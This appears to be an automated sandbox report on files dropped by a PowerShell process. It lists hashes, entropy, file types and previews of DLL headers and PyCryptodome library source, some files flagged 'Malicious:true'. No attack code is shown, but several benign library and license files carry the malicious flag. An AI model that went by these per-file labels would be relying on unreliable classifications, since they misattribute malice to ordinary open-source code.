                                                                                                                                                                                                                              SHA-256:E72E06C721DD617140EDEBADD866A91CF97F7215CBB732ECBEEA42C208931F49
                                                                                                                                                                                                                              SHA-512:F7FD695E093EDE26FCFD0EE45ADB49D841538EB9DAAE5B0812F29F0C942FB13762E352C2255F5DB8911F10FA1B6749755B51AAE1C43D8DF06F1D10DE5E603706
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5261
                                                                                                                                                                                                                              Entropy (8bit):5.187172722384075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:M4DqrYJALrYJHdt3EHGuIcWIKiYHbJM/pQ4W8NtOH6mCli0yZRYAD0Ov:Jqrskrs9t3q/Ih2/yzy66NlNyQW0Ov
                                                                                                                                                                                                                              MD5:1BCBC8A97A925C34AAA01860EE4D8D63
                                                                                                                                                                                                                              SHA1:CCF52E350B94DA06E6D8980E31CB93300A70B1C4
                                                                                                                                                                                                                              SHA-256:B92D60974EF5FF39314516C2FA7ADF20886C4201C9AEA68EC633F921D4ED4B63
                                                                                                                                                                                                                              SHA-512:BF9AB4DC9294CC4E70D500E594D72923722EC9A528B59881649730B89E4B6F89CCFD3E056A4DCEE0A59B416CEC513C2F7D97C326B680149173BAE01C9DC99394
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2019, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):331
                                                                                                                                                                                                                              Entropy (8bit):4.758113161274864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYB6RNx6FJdRloxdRX8jL8SdyAEBfFpU80/p9YKXrH0L8Sy:1REYB6RT61Rlo3RX8jLVMBM80/p+MrUe
                                                                                                                                                                                                                              MD5:8BEBFA73A502269CB8A0C4CE6C714C5A
                                                                                                                                                                                                                              SHA1:176037806AA4E83D03FEDCC40CBACF9D1D5F675A
                                                                                                                                                                                                                              SHA-256:564C2B01DC5D096BF508761DB881E201172E2D60E939BA2F78E20BE46A74DDA0
                                                                                                                                                                                                                              SHA-512:50C4AE1F408F98EA4650966444F3E552559A3D92ED79EC66E0C3424A6EBAA11AD577F47853C91BCDC1B5910C2A2815D55CCEFD23D5C1E0BD4F02136CCB3D8884
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Tuple....def read_int4(data: bytes) -> Tuple[int, bytes]: .....def read_bytes(data: bytes) -> Tuple[bytes, bytes]: .....def read_string(data: bytes) -> Tuple[str, bytes]: .....def check_padding(pad: bytes) -> None: .....def import_openssh_private_generic(data: bytes, password: bytes) -> Tuple[str, bytes]: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                                              Entropy (8bit):4.488437566846231
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                                                                                                              MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                                                                                                              SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                                                                                                              SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                                                                                                              SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1866
                                                                                                                                                                                                                              Entropy (8bit):5.171387928684167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:hIB0jcQHMsvI/S3oCFadPyopEm7XRXTR5:SFQHvohqTm7XRXF5
                                                                                                                                                                                                                              MD5:F6DAA1095142342733AB132C05D1DDFE
                                                                                                                                                                                                                              SHA1:1EBAFA39A224F69887333A00E0AE1BD69178315E
                                                                                                                                                                                                                              SHA-256:05E8D3E5D2B18C1731189DB337B04CB83E966DC385930836FA22E9EE0F376FB9
                                                                                                                                                                                                                              SHA-512:246058D7F397CDCACE81B09FDEBA5B17C240264A70375D99B4FD0FFBFFC54208D312BC38894E74B531BD3F9CB40105FA9DD834C74250B73A0C8E8DB583FB0E41
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Random/__init__.py : PyCrypto random number generation..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ==
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):386
                                                                                                                                                                                                                              Entropy (8bit):4.828244249619416
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYBFovLD2dC1ZSM+mHv0tAE7Ky3L5RSMtAMjMEFy7yA4TSJDZj5:1REYB8D2ACM+meh7KyVVpJy7yAGkDR5
                                                                                                                                                                                                                              MD5:A4CDA07BACD9EDBD7C0243B029D79400
                                                                                                                                                                                                                              SHA1:B068F43B0EAE31972C2B6C6335BBCA2497B948FB
                                                                                                                                                                                                                              SHA-256:3A9548EF07A83C2F2BF7DB05EDB776BD788B9D9C112EA8155333242839CC27D7
                                                                                                                                                                                                                              SHA-512:A1412BAF95D6910D821B927BE91CFD740F2DD8A98E259950E5FF06409CEC8E01EB6B06AC1747A8FF06098849142EBF2754AEED361FFCD37954FFFC13BCE1D3C0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Any....__all__ = ['new', 'get_random_bytes']....from os import urandom....class _UrandomRNG(object):.... def read(self, n: int) -> bytes:..... def flush(self) -> None: ..... def reinit(self) -> None: ..... def close(self) -> None: .......def new(*args: Any, **kwargs: Any) -> _UrandomRNG: .......def atfork() -> None: .......get_random_bytes = urandom....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1357
                                                                                                                                                                                                                              Entropy (8bit):4.8311070365251645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4jGuBEoSKNB3K9jPq9rLWowb0rJ4eBPXe1EeupfEZ:wJB6pmv1mecupfEZ
                                                                                                                                                                                                                              MD5:38F11FC09A4654AE85EF1759F6963AE9
                                                                                                                                                                                                                              SHA1:39FF8220BF00ADB7F4AC8C642A105C05AC584D31
                                                                                                                                                                                                                              SHA-256:03C88761863B3D5EF5664DBFFCE221012743C85FED1DEBD8E4C13098F044B1AB
                                                                                                                                                                                                                              SHA-512:2013CE4814A24FE685BC33557E40DB52CF54736DF31163D0E0362FF107BD070DA27EAA623BF45019AD0B9A8E7678641547286C1804F55C744325A4DC5E219644
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfJ.........................>.....d.d.g.Z.d.d.l.m.Z.....G.d...d.e.........Z.d...Z.d...Z.e.Z.y.)...new..get_random_bytes.........urandomc.....................$.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.y.)..._UrandomRNGc...........................t.........|.........S.).z0Return a random byte string of the desired size.r....)...self..ns.... .GC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Random/__init__.py..readz._UrandomRNG.read....s..........q.z........c...........................y...z0Method provided for backward compatibility only.N....r....s.... r......flushz._UrandomRNG.flush!.............r....c...........................y.r....r....r....s.... r......reinitz._UrandomRNG.reinit%...r....r....c...........................y.r....r....r....s.... r......closez._UrandomRNG.close)...r....r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........s..........................r....r....c...........................t.................S.).zFReturn a fi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4975
                                                                                                                                                                                                                              Entropy (8bit):5.395061573914023
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:2yWkBzxbBz2cTWW9smqpBO6M6vOKYEpWaGaSHIfXWegbKBcYV:GgNR2OWtYePYEpWFI+e2ElV
                                                                                                                                                                                                                              MD5:1FB66E825F6B0347FC53017D5304D891
                                                                                                                                                                                                                              SHA1:99A0F85D047293E7DCF3220FA94FAF0A941DDCEB
                                                                                                                                                                                                                              SHA-256:102ED5514FDC17D3DB4A708C7E871C6B31E2C4D75BFAC8B288258A0CF7D3D857
                                                                                                                                                                                                                              SHA-512:016885190E6AE9202C77ED7A26BAAB431F13211CD991CF358239890D6CF951682CE245A92D3504834E8329E05E48B0715C2D3F9B4DA4D48B87876FF2E625D8D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf................................g.d...Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...e.........Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.d.d.l.m.Z.m.Z.m.Z.m.Z...y.).)...StrongRandom..getrandbits..randrange..randint..choice..shuffle..sample.....)...Random)...is_native_intc.....................8.....e.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....Nc.....................t.....|...|...d.|._.........y.|...|...|.|._.........y.|...|...|.j...................|._.........y.t.........d...........).Nz(Cannot specify both 'rng' and 'randfunc')..._randfunc..read..ValueError)...self..rng..randfuncs.... .EC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Random/random.py..__init__z.StrongRandom.__init__ ...sE.................!.D.N.....!.c.k..%.D.N.......#./.. .X.X.D.N.....G..H..H.....c..........................|.j....................#t.........j.....................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5372
                                                                                                                                                                                                                              Entropy (8bit):4.828979692628258
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:o5wfFQHvoeTcHIpVaRhNkNNrvvGDwotbxcOV+gnNflG7b0/Yt5:o5wdQHv5rjIvsotlcU+g60/S
                                                                                                                                                                                                                              MD5:3BD14C0DD7FE75741EE0742BDA794418
                                                                                                                                                                                                                              SHA1:31B75C61FEA51D7E69247B3D47FC37DE5247C817
                                                                                                                                                                                                                              SHA-256:01ADBD3F51A22F71EDD8B3FB3F45BB849C9D9A46E00A7CFD25C28EA780512E3C
                                                                                                                                                                                                                              SHA-512:4FE054877C0749994FDE32CEA437C659FD2B406E3E057A2D9C27ADCFF6E556D8FEC48615B01AAD7B6502B40E5CF7C2CA342B626DB8D07F191E2D63FBD9E15E28
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Random/random.py : Strong alternative for the standard 'random' module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# C
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                              Entropy (8bit):4.891350639959851
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REqJBQCf+sAJOIE5P0fid1o4zOZKXiojo/f:lQW+sd5CidO4ifao/f
                                                                                                                                                                                                                              MD5:0B01F3499238530A9A99E48F305DB9AC
                                                                                                                                                                                                                              SHA1:7AE9ADEAF96CF6B47C721A124AA568AB1A0B605C
                                                                                                                                                                                                                              SHA-256:043AEDA2F263A42A0086FCBB0CA801FF1D9BF396FFCC966452FF25DD5030A013
                                                                                                                                                                                                                              SHA-512:4CDCFA0E53EBE9F65207817A79419F6C60E6F0BB51EF4ECDB89736244058A690410F767EC8AAAC2C2B10BDB38361E0F60FCD3DF3580639935A423A0E6E068517
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3680
                                                                                                                                                                                                                              Entropy (8bit):5.085786985818767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:NCwEIB0jcQHMsvI/S3oCF2D0BVjtxxtDP5H8k/38KlKKFpBnFRNxtZFRtf/hzdrB:UwfFQHvo58zGk/sEjd/1drB
                                                                                                                                                                                                                              MD5:CF0E3F50FEEC49E1E243B3576BC34E7A
                                                                                                                                                                                                                              SHA1:D9AD4301C9F023D2067384BB241859B032B6C92B
                                                                                                                                                                                                                              SHA-256:EC3B0CB878618BF4A7ADCF497146F4CA3F203B448EA510ABE8B72C9A55568347
                                                                                                                                                                                                                              SHA-512:A4C3C13B23ECD0B8E20726C92741BE318CDD5DC39BD4125246EF06227F1DD2534B378F88B305AB6AC51A7ECABA88A4E80B9956BC9B234666F316516E5EE513F7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/__init__.py: Self-test for cipher modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3108
                                                                                                                                                                                                                              Entropy (8bit):5.128681539742173
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ZwPnnITyErNUyUP2eKHVLokVy9x9PBM50UGe5+Y4Po68S:ZtTxiP2eeVB09x9PBmfL+r
                                                                                                                                                                                                                              MD5:D70C354764532BACC3E1ED690EB60D25
                                                                                                                                                                                                                              SHA1:A7816B29EAA6AE594186DCEF0FCFADB2A261CC1D
                                                                                                                                                                                                                              SHA-256:A5EA43C2BB1EAD4C19FCAE6F9AA9DD3A5AF55F4E1B04D7AAE31ED1C17FACB97A
                                                                                                                                                                                                                              SHA-512:F0DF45E89431D22F1D894402F28BEFB919DED260068D234ACA155790D8ED838B398156DF68BD600957F64B8D19384664DAD35B4343AFF6F150277A8A6C361C7F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf`.........................V.....d.Z.d.Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j...................d.............y.y.).z.Self-test for cipher modulesz.$Id$c..........................g.}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21952
                                                                                                                                                                                                                              Entropy (8bit):4.57684636032147
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:VbjXaaZ1At5/5mUoxFIBHqM/aRC/SJru/RfrfMZ4XEeN:VbjXP1A/hmUKIBHqM/aRnrmfC4XLN
                                                                                                                                                                                                                              MD5:16F69C059824DB123ACD3F17115E52B6
                                                                                                                                                                                                                              SHA1:D51653D13A5E9A266C4C57CD246B547DF176855D
                                                                                                                                                                                                                              SHA-256:D252CA13A539756426260AA5F7B35A692415EBF6CF08417FD91625962A18719A
                                                                                                                                                                                                                              SHA-512:0EA12030D931C1AAF7838E8BBB155B2F78AF13221BEDC3A7608127CB23BF79D1389CEA81A7C93C0A8015A1BB644B37D01281F7163B8814F3BC49D38F4271EE05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.E.............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.e.f.d...Z...G.d...d.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...e.........f.d...Z.d...Z.y.).z&Self-testing for PyCrypto hash modules.....N)...a2b_hex..b2a_hex..hexlify)...b)...strxor_cc...........................e.Z.d.Z.y.)..._NoDefaultN)...__name__..__module__..__qualname__........NC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/Cipher/common.pyr....r....!...s......r....r....c.....................L.......|.|.....}.|.|.=.|.S.#.t.........$.r...|.t.........u.r...|.c.Y.S.w.x.Y.w.).zAGet an item from a dictionary, and remove it from the dictionary.)...KeyErrorr....)...d..k..default..retvals.... r
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):53041
                                                                                                                                                                                                                              Entropy (8bit):5.064907910374513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:QrWaDyavasKJIHIZKZpFQuCf74ZGOBZxDrP3fUfIqcDFRBS8VYC+dNWT:QrlDy6asKWIZKFQZ74ZFxD8VcJg6
                                                                                                                                                                                                                              MD5:4EBE6A41DFB38871D96C04B6E54AB8F9
                                                                                                                                                                                                                              SHA1:82E1D344730EA7E47C5CB770F2D9F82E0022BEA3
                                                                                                                                                                                                                              SHA-256:C84C1B16221E38608DF98786EB15FB32E54B26F811FEEFF0438CBD3F4FADBF27
                                                                                                                                                                                                                              SHA-512:3AF1C0827E3DD4457D7F835F09B21B1132336077074D59FD16AE2BE1F0533389E3C64BA41192592E09C4F26231ABE3BAF6D1CDC254B1408510110A7DB57175BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vfz..............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.....d.d.l.m.Z...g.d...Z.g.Z.e.D.])..Z.e.j...................e.d.....d.z...e.d.....d.z...e.d.....e.d.....f............+..e.e.z...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j,..................d.............y.y.).z%Self-test suite for Crypto.Cipher.AES.....)...print_functionN)...SHA256)...AES)...*)...hexlify(....).. 00112233445566778899aabbccddeeff. 69c4e0d86a7b0430d8cdb78070b4c55a. 000102030405060708090a0b0c0d0e0fz.FIPS 197 C.1 (AES-128)).r..... dda97ca4864cdfe06eaf70a0ec0d7191.0000102030405060708090a0b0c0d0e0f1011121314151617z.FIPS 197 C.2 (AES-192)).r..... 8ea2b7ca516745bfeafc49904b496089.@000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1fz.FIPS 197 C.3 (AES-256)).. 506812a45f08c889b97f5980038b8359. d8f532538289ef7d06b506a4fd5be9c9. 00010203050607080a0b0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6302
                                                                                                                                                                                                                              Entropy (8bit):5.220044022792171
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:VBARLBYXW9UF/iS396B6vLR+ohxbAENBTqD2LE+YP2XWy7PC:VBmLBYtFiSw0vLR+ohJAOqDy0eGy7q
                                                                                                                                                                                                                              MD5:73B5684B5EB52D793E3E9BB8FEA1AA9F
                                                                                                                                                                                                                              SHA1:D0B486B04646B7862A761CE1900CEA91B5135F30
                                                                                                                                                                                                                              SHA-256:9E6E10190D2143127848FDBD2D1CF12DFC8E2820F26C71677B183026C19F8C95
                                                                                                                                                                                                                              SHA-512:A51CD837E26437977B043393C3D2142B9A7FC971CD6743D7C5806823CAEF37AE30497740F3D1981FE91FCE54FF82924FAF5E9E182DE2ED11FB4EB5CFED90F4F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf................................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d.d...e.d...........f.d.d.d.d...e.d...........f.d.d.d.d...e.d...........f.d.d.d.d...e.d...........f.d.d.d.d...e.d...........f.d.d.d.d...e.d...........f.d.d.d.d...e.d...........f.d.d d!d"d#d$d%d&d'd(d)d*d+d,d-d.g.Z...G.d/..d0e.j...........................Z...G.d1..d2e.j...........................Z...G.d3..d4e.j...........................Z.i.f.d5..Z.e.d6k(..r.d.d.l.Z.d7..Z...e.j ..................d8.9..........y.y.):z&Self-test suite for Crypto.Cipher.ARC2.....N)...b..bchr....ARC2..0000000000000000..ebb773f993278effz.RFC2268-1.?.......effective_keylen..ffffffffffffffff..278b27e42e2f0d49z.RFC2268-2.@.....1000000000000001..30649edf9be7d2c2..3000000000000000z.RFC2268-3..6ccf4308974c267f..88bca90e90875az.RFC2268-5..1a807d272bbe5db1. 88bca90e90875a7f0f79c384627bafb2z.RFC2268-6..2269552ab0f85ca6z.RFC2268-7......5b78d3a43dfff1f1.B88bca90e90875a7f0f79c384627bafb216f80a6f85920584c42fceb0be255daf1ez.RFC2268-8.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26113
                                                                                                                                                                                                                              Entropy (8bit):5.181349227793854
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:0dsHWv5fwJraJGuR7WI/O5c/FdypaElIRR4RythON9eBOaJi:0dX5ira427LMAyazRRAIE9oOaE
                                                                                                                                                                                                                              MD5:1AEACC0C67137AE07E6B07D638D45988
                                                                                                                                                                                                                              SHA1:D021AA0C142C5635201B8E9D561F80BAFE1EDEC1
                                                                                                                                                                                                                              SHA-256:3C7226A5819A6C5E4061B60BD2E029F3DC269C10E3B18022E7A46A8411FAB23E
                                                                                                                                                                                                                              SHA-512:107C0B7665390E31E1B269449555E074009A48D314B65CCC639E3A74BD2031839716ACDDB5460C3F91CA1EBCA3DD2AA6698F6C7C780A187581B7F21A53BF7358
                                                                                                                                                                                                                              Malicious:false
